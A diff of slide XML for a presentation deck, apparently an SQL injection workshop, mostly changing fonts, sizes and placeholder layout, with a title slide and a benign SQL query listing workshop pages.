-                  <a:srgbClr val="ffffff"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>6/12/18</a:t>
-            </a:fld>
-            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
-              <a:latin typeface="Times New Roman"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="2" name="PlaceHolder 3"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="ftr"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="4038480" y="6356520"/>
-            <a:ext cx="4114440" cy="364680"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr anchor="ctr"/>
-          <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
-              <a:latin typeface="Times New Roman"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="PlaceHolder 4"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="sldNum"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="8610480" y="6356520"/>
-            <a:ext cx="2742840" cy="364680"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr anchor="ctr"/>
-          <a:p>
-            <a:pPr algn="r">
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:fld id="{01A45FD5-AC25-498F-9A7D-7D4CD2803AF3}" type="slidenum">
-              <a:rPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="ffffff"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>&lt;number&gt;</a:t>
-            </a:fld>
-            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
-              <a:latin typeface="Times New Roman"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="4" name="PlaceHolder 5"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -3116,19 +2781,13 @@
               <a:buChar char=""/>
             </a:pPr>
             <a:r>
-              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="ffffff"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
+              <a:rPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
+                <a:latin typeface="Arial"/>
               </a:rPr>
               <a:t>Click to edit the outline text format</a:t>
             </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
+            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
           <a:p>
@@ -3144,19 +2803,13 @@
               <a:buChar char=""/>
             </a:pPr>
             <a:r>
-              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="ffffff"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
+              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
+                <a:latin typeface="Arial"/>
               </a:rPr>
               <a:t>Second Outline Level</a:t>
             </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
+            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
           <a:p>
@@ -3172,19 +2825,13 @@
               <a:buChar char=""/>
             </a:pPr>
             <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="ffffff"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
+              <a:rPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
+                <a:latin typeface="Arial"/>
               </a:rPr>
               <a:t>Third Outline Level</a:t>
             </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
+            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
           <a:p>
@@ -3200,19 +2847,13 @@
               <a:buChar char=""/>
             </a:pPr>
             <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="ffffff"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
+              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
+                <a:latin typeface="Arial"/>
               </a:rPr>
               <a:t>Fourth Outline Level</a:t>
             </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
+            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
           <a:p>
@@ -3229,18 +2870,12 @@
             </a:pPr>
             <a:r>
               <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="ffffff"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
+                <a:latin typeface="Arial"/>
               </a:rPr>
               <a:t>Fifth Outline Level</a:t>
             </a:r>
             <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
+              <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
           <a:p>
@@ -3257,18 +2892,12 @@
             </a:pPr>
             <a:r>
               <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="ffffff"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
+                <a:latin typeface="Arial"/>
               </a:rPr>
               <a:t>Sixth Outline Level</a:t>
             </a:r>
             <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
+              <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
           <a:p>
@@ -3285,18 +2914,12 @@
             </a:pPr>
             <a:r>
               <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="ffffff"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
+                <a:latin typeface="Arial"/>
               </a:rPr>
               <a:t>Seventh Outline Level</a:t>
             </a:r>
             <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
+              <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
         </p:txBody>
@@ -3347,7 +2970,7 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="41" name="PlaceHolder 1"/>
+          <p:cNvPr id="38" name="PlaceHolder 1"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -3357,42 +2980,32 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="838080" y="365040"/>
-            <a:ext cx="10515240" cy="1325160"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr anchor="ctr"/>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="90000"/>
-              </a:lnSpc>
-            </a:pPr>
+            <a:off x="609480" y="273600"/>
+            <a:ext cx="10972440" cy="1144800"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
+          <a:p>
+            <a:pPr algn="ctr"/>
             <a:r>
               <a:rPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="ffffff"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri Light"/>
-              </a:rPr>
-              <a:t>Click to edit Master title style</a:t>
+                <a:latin typeface="Arial"/>
+              </a:rPr>
+              <a:t>Click to edit the title text format</a:t>
             </a:r>
             <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="42" name="PlaceHolder 2"/>
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="39" name="PlaceHolder 2"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -3402,275 +3015,169 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="838080" y="1825560"/>
-            <a:ext cx="10515240" cy="4350960"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:p>
-            <a:pPr marL="228600" indent="-228240">
-              <a:lnSpc>
-                <a:spcPct val="90000"/>
-              </a:lnSpc>
+            <a:off x="609480" y="1604520"/>
+            <a:ext cx="10972440" cy="3977280"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0">
+            <a:normAutofit/>
+          </a:bodyPr>
+          <a:p>
+            <a:pPr marL="432000" indent="-324000">
               <a:spcBef>
-                <a:spcPts val="1001"/>
+                <a:spcPts val="1417"/>
               </a:spcBef>
               <a:buClr>
                 <a:srgbClr val="ffffff"/>
               </a:buClr>
-              <a:buFont typeface="Arial"/>
-              <a:buChar char="•"/>
+              <a:buSzPct val="45000"/>
+              <a:buFont typeface="Wingdings" charset="2"/>
+              <a:buChar char=""/>
             </a:pPr>
             <a:r>
-              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="ffffff"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>Edit Master text styles</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1" marL="685800" indent="-228240">
-              <a:lnSpc>
-                <a:spcPct val="90000"/>
-              </a:lnSpc>
+              <a:rPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
+                <a:latin typeface="Arial"/>
+              </a:rPr>
+              <a:t>Click to edit the outline text format</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1" marL="864000" indent="-324000">
               <a:spcBef>
-                <a:spcPts val="499"/>
+                <a:spcPts val="1134"/>
               </a:spcBef>
               <a:buClr>
                 <a:srgbClr val="ffffff"/>
               </a:buClr>
-              <a:buFont typeface="Arial"/>
-              <a:buChar char="•"/>
+              <a:buSzPct val="75000"/>
+              <a:buFont typeface="Symbol" charset="2"/>
+              <a:buChar char=""/>
             </a:pPr>
             <a:r>
-              <a:rPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="ffffff"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>Second level</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="2" marL="1143000" indent="-228240">
-              <a:lnSpc>
-                <a:spcPct val="90000"/>
-              </a:lnSpc>
+              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
+                <a:latin typeface="Arial"/>
+              </a:rPr>
+              <a:t>Second Outline Level</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="2" marL="1296000" indent="-288000">
               <a:spcBef>
-                <a:spcPts val="499"/>
+                <a:spcPts val="850"/>
               </a:spcBef>
               <a:buClr>
                 <a:srgbClr val="ffffff"/>
               </a:buClr>
-              <a:buFont typeface="Arial"/>
-              <a:buChar char="•"/>
+              <a:buSzPct val="45000"/>
+              <a:buFont typeface="Wingdings" charset="2"/>
+              <a:buChar char=""/>
             </a:pPr>
             <a:r>
-              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="ffffff"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>Third level</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="3" marL="1600200" indent="-228240">
-              <a:lnSpc>
-                <a:spcPct val="90000"/>
-              </a:lnSpc>
+              <a:rPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
+                <a:latin typeface="Arial"/>
+              </a:rPr>
+              <a:t>Third Outline Level</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="3" marL="1728000" indent="-216000">
               <a:spcBef>
-                <a:spcPts val="499"/>
+                <a:spcPts val="567"/>
               </a:spcBef>
               <a:buClr>
                 <a:srgbClr val="ffffff"/>
               </a:buClr>
-              <a:buFont typeface="Arial"/>
-              <a:buChar char="•"/>
+              <a:buSzPct val="75000"/>
+              <a:buFont typeface="Symbol" charset="2"/>
+              <a:buChar char=""/>
             </a:pPr>
             <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="ffffff"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>Fourth level</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="4" marL="2057400" indent="-228240">
-              <a:lnSpc>
-                <a:spcPct val="90000"/>
-              </a:lnSpc>
+              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
+                <a:latin typeface="Arial"/>
+              </a:rPr>
+              <a:t>Fourth Outline Level</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="4" marL="2160000" indent="-216000">
               <a:spcBef>
-                <a:spcPts val="499"/>
+                <a:spcPts val="283"/>
               </a:spcBef>
               <a:buClr>
                 <a:srgbClr val="ffffff"/>
               </a:buClr>
-              <a:buFont typeface="Arial"/>
-              <a:buChar char="•"/>
+              <a:buSzPct val="45000"/>
+              <a:buFont typeface="Wingdings" charset="2"/>
+              <a:buChar char=""/>
             </a:pPr>
             <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="ffffff"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>Fifth level</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:solidFill>
+              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
+                <a:latin typeface="Arial"/>
+              </a:rPr>
+              <a:t>Fifth Outline Level</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="5" marL="2592000" indent="-216000">
+              <a:spcBef>
+                <a:spcPts val="283"/>
+              </a:spcBef>
+              <a:buClr>
                 <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="43" name="PlaceHolder 3"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="dt"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="838080" y="6356520"/>
-            <a:ext cx="2742840" cy="364680"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr anchor="ctr"/>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
+              </a:buClr>
+              <a:buSzPct val="45000"/>
+              <a:buFont typeface="Wingdings" charset="2"/>
+              <a:buChar char=""/>
             </a:pPr>
-            <a:fld id="{C848FDAF-8278-45B1-9E63-7F9A4681887C}" type="datetime">
-              <a:rPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="ffffff"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>6/12/18</a:t>
-            </a:fld>
-            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
-              <a:latin typeface="Times New Roman"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="44" name="PlaceHolder 4"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="ftr"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="4038480" y="6356520"/>
-            <a:ext cx="4114440" cy="364680"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr anchor="ctr"/>
-          <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
-              <a:latin typeface="Times New Roman"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="45" name="PlaceHolder 5"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="sldNum"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="8610480" y="6356520"/>
-            <a:ext cx="2742840" cy="364680"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr anchor="ctr"/>
-          <a:p>
-            <a:pPr algn="r">
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
+                <a:latin typeface="Arial"/>
+              </a:rPr>
+              <a:t>Sixth Outline Level</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="6" marL="3024000" indent="-216000">
+              <a:spcBef>
+                <a:spcPts val="283"/>
+              </a:spcBef>
+              <a:buClr>
+                <a:srgbClr val="ffffff"/>
+              </a:buClr>
+              <a:buSzPct val="45000"/>
+              <a:buFont typeface="Wingdings" charset="2"/>
+              <a:buChar char=""/>
             </a:pPr>
-            <a:fld id="{4A6C0556-7292-4BF7-9FA9-241D1DFC8E14}" type="slidenum">
-              <a:rPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="ffffff"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>1</a:t>
-            </a:fld>
-            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
-              <a:latin typeface="Times New Roman"/>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
+                <a:latin typeface="Arial"/>
+              </a:rPr>
+              <a:t>Seventh Outline Level</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
         </p:txBody>
@@ -3714,14 +3221,14 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="82" name="TextShape 1"/>
-          <p:cNvSpPr txBox="1"/>
+          <p:cNvPr id="76" name="CustomShape 1"/>
+          <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
             <a:off x="1523880" y="1122480"/>
-            <a:ext cx="9143640" cy="2387160"/>
+            <a:ext cx="9143280" cy="2386800"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -3731,8 +3238,14 @@
             <a:noFill/>
           </a:ln>
         </p:spPr>
-        <p:txBody>
-          <a:bodyPr anchor="b"/>
+        <p:style>
+          <a:lnRef idx="0"/>
+          <a:fillRef idx="0"/>
+          <a:effectRef idx="0"/>
+          <a:fontRef idx="minor"/>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="b"/>
           <a:p>
             <a:pPr algn="ctr">
               <a:lnSpc>
@@ -3749,24 +3262,21 @@
               <a:t>SQL Injection</a:t>
             </a:r>
             <a:endParaRPr b="0" lang="en-US" sz="6000" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="83" name="TextShape 2"/>
-          <p:cNvSpPr txBox="1"/>
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="77" name="CustomShape 2"/>
+          <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
             <a:off x="1523880" y="3602160"/>
-            <a:ext cx="9143640" cy="1655280"/>
+            <a:ext cx="9143280" cy="1654920"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -3776,8 +3286,14 @@
             <a:noFill/>
           </a:ln>
         </p:spPr>
-        <p:txBody>
-          <a:bodyPr/>
+        <p:style>
+          <a:lnRef idx="0"/>
+          <a:fillRef idx="0"/>
+          <a:effectRef idx="0"/>
+          <a:fontRef idx="minor"/>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
           <a:p>
             <a:pPr algn="ctr">
               <a:lnSpc>
@@ -3804,7 +3320,7 @@
       </p:sp>
       <p:pic>
         <p:nvPicPr>
-          <p:cNvPr id="84" name="Picture 5" descr=""/>
+          <p:cNvPr id="78" name="Picture 5" descr=""/>
           <p:cNvPicPr/>
           <p:nvPr/>
         </p:nvPicPr>
@@ -3815,7 +3331,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="8229600" y="6208560"/>
-            <a:ext cx="3962160" cy="649080"/>
+            <a:ext cx="3961800" cy="648720"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -3876,14 +3392,14 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="100" name="CustomShape 1"/>
+          <p:cNvPr id="104" name="CustomShape 1"/>
           <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="3791160" y="3051360"/>
-            <a:ext cx="3503160" cy="364680"/>
+            <a:off x="3375720" y="1951920"/>
+            <a:ext cx="4748040" cy="2558880"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -3900,7 +3416,7 @@
           <a:fontRef idx="minor"/>
         </p:style>
         <p:txBody>
-          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
+          <a:bodyPr wrap="none" lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
           <a:p>
             <a:pPr>
               <a:lnSpc>
@@ -3913,8 +3429,169 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>select dinner from mealtimes;</a:t>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>select workshop, url from workshops;</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>+-------------------------------------+</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>| Home.         | sqli.uid0.sh.       |</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>| In Band       | sqli.uid0.sh/ib     |</a:t>
